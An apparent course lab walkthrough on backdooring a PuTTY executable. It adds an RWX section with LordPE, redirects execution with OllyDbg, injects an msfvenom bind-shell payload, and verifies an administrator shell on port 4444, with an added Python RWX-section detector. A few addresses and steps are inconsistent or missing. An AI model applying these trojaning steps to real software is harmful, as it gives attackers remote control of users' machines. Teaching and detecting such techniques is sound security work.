https://samsclass.info/127/proj/lordpe.zip
Launch LordPE.
LordPE opens, as shown below. In this view, it shows currently running processes.
In the Open box, navigate to puttybad.exe and double-click it.
A "PE Editor" box opens, showing general information about putty, as shown below.
In the "PE Editor" box, on the right, click the Sections button.
A "Section Table" box opens, showing the four sections in the putty executable.
Right-click one of the sections and click "add section header", as shown below.
A new section named "NewSec" appears. Currently, this section has "VSize" and "RSize" values of 0, as shown below.
In the "Section Table" box, right-click NewSec and click "edit section header".
In the "[Edit SectionHeader]" window, change the VirtualSize and RawSize to 00001000, as shown below.
In the "[Edit SectionHeader]" window, at the bottom, in the "Flags" row, click the square button labelled "...".
Note the top three check boxes here: this segment is Executable, Readable, and Writeable. That's good; we can place any type of code we want to here, even self-modifying code.
Click OK.
Click OK.
Close the "Section Table" box.
In the "PE Editor" box, click the Save button.
In the "PE Editor" box, click the OK button.
Close the LordPE window.
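As an added example (not part of the original project files), the following Python script walks a PE file's section table and flags any section whose Flags make it readable, writable and executable at once, the combination the NewSec section created above has; a legitimately built binary almost never carries an RWX section, so this is a cheap triage check. It builds a constructed, minimal PE32 skeleton inline (the function and variable names are mine, not LordPE's) so it runs offline; for a real file, pass its bytes to suspicious_sections().

```python
import struct

# Section Characteristics bits from the PE/COFF specification
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

def parse_sections(data):
    """Walk the section table of a PE image in memory; return (name, VSize, RSize, Flags) tuples."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size          # section table follows the optional header
    out = []
    for i in range(nsec):
        off = table + i * 40              # each IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, _vaddr, rsize = struct.unpack_from("<8sIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rsize, chars))
    return out

def suspicious_sections(data):
    """Names of sections that are readable, writable AND executable at once."""
    return [name for name, _, _, chars in parse_sections(data) if chars & RWX == RWX]

def build_sample_pe():
    """Constructed PE32 skeleton (not a real putty binary): .text plus a LordPE-style RWX 'NewSec'."""
    def sec(name, vsize, vaddr, rsize, raw, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, raw, 0, 0, 0, 0, chars)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = b"\0" * 0xE0                                       # PE32 optional header, zeroed
    text = sec(b".text", 0x7000, 0x1000, 0x7000, 0x400,
               IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    newsec = sec(b"NewSec", 0x1000, 0x84000, 0x1000, 0x80000, IMAGE_SCN_CNT_CODE | RWX)
    return dos + b"PE\0\0" + coff + opt + text + newsec

if __name__ == "__main__":
    for name, vsize, rsize, chars in parse_sections(build_sample_pe()):
        print(f"{name:8s} VSize={vsize:08X} RSize={rsize:08X} Flags={chars:08X}")
    print("RWX sections:", suspicious_sections(build_sample_pe()))
```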
In Ollydbg, from the menu bar, click File, Open. Navigate to puttybad.exe and open it.
From the Ollydbg menu bar, click View, Memory.
Ollydbg shows the memory layout of putty. As highlighted in the image below, the "NewSec" section begins at address 484000.
In the "Memory map" window, double-click NewSec.
A "Dump" window opens, showing the data stored in NewSec, as shown below.
This is a digital signature, added to recent downloads of Putty. Notice the readable text in the lower portion of this window, on the right side, saying "AddTrust External CA Root".
The digital signature is a good way to verify file integrity, but it's not essential for file execution, so we can overwrite it.
Close the Dump window. Close the "Memory map" window.
In the top left pane of the CPU window, right-click, and click "Go to", Expression.
In the "Enter expression to follow" box, enter 41CB6E
Click OK.
Ollydbg moves to show the PUSH instruction that loads the "login as: " string, as shown below.
Right-click the PUSH instruction and click Assemble, as shown below.
In the "Assemble" box, enter this command, as shown below:
JMP 484000
Click the Assemble button.
Click the Cancel button.
The PUSH instruction has been replaced by this instruction, as shown below:
JMP putty-ne.00484000
In the JMP instruction, right-click 00484000 and click Follow.
Ollydbg moves to address 00484000.
Right-click 00484000 and click Assemble. Enter this command, as shown below.
INT3
Click Assemble. Click Cancel.
Address 484000 now contains an INT3 instruction, which is CC in hexadecimal, as shown below.
Putty opens. In the "Host Name (or IP address)" box, type
ad.samsclass.info
At the bottom, click the Open button. The program stops, and the status bar in the lower left corner of the Ollydbg window says "INT3 command at putty-ne.00404000", as outlined in green in the image below.
This shows that the code redirection worked, and executed the first instruction in the .NewSec section!
In Ollydbg, in the top left pane of the CPU window, right-click, and click "Go to", Expression.
In the "Enter expression to follow" box, verify that 41CB6E is entered. Click OK.
In Ollydbg, in the top left pane of the CPU window, right-click, point to "Copy to Executable", and click "All modifications", as shown below.
A "Copy selection to executable file" box pops up. Click the "Copy all" button.
A new window pops up, with a title ending in "puttybad.exe".
Right-click in the new window and click "Save file".
Save the file as "puttybad2.exe".
Close Ollydbg.
You can generate shellcode with msfvenom, on Kali. Here's what I got when I did it:
root@kali:~/Cminer# msfvenom -p windows/shell_bind_tcp -fc
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 328 bytes
Here's the shellcode, reformatted and broken into two sections.
Scroll to address 00080000. After a region filled with zeroes, it starts with these bytes: "A8 1B 00", as shown below.
Above, on this Web page, highlight and copy the first set of shellcode bytes, from "fc" through "68".
In HxD, right-click the byte at address 00080000 and click "Paste write", as shown below.
The first portion of the shellcode appears in red text, as shown below.
Above, on this Web page, highlight and copy the second set of shellcode bytes, from "29" through "d5".
In HxD, right-click the byte at address 000800A5 and click "Paste write". Your screen should look like the image below.
In HxD, click File, Save. Close HxD.
Putty opens. In the "Host Name (or IP address)" box, type
ad.samsclass.info
At the bottom, click the Open button. A black Putty window opens, but remains blank, as shown below.
This is because we were sloppy when inserting shellcode, and broke the normal operation of Putty.
Open a Command Prompt and execute this command:
netstat -an | findstr 4444
You should see port 4444 LISTENING, as shown below. Then execute this command:
telnet 127.0.0.1 4444
A Command Prompt opens, allowing you to execute commands on the server, as shown below. Execute this command:
whoami
You are the local administrator, as shown below, and so is anyone else who connects to this machine on port 4444.
The CRC32 is the hash, like this: 07b01710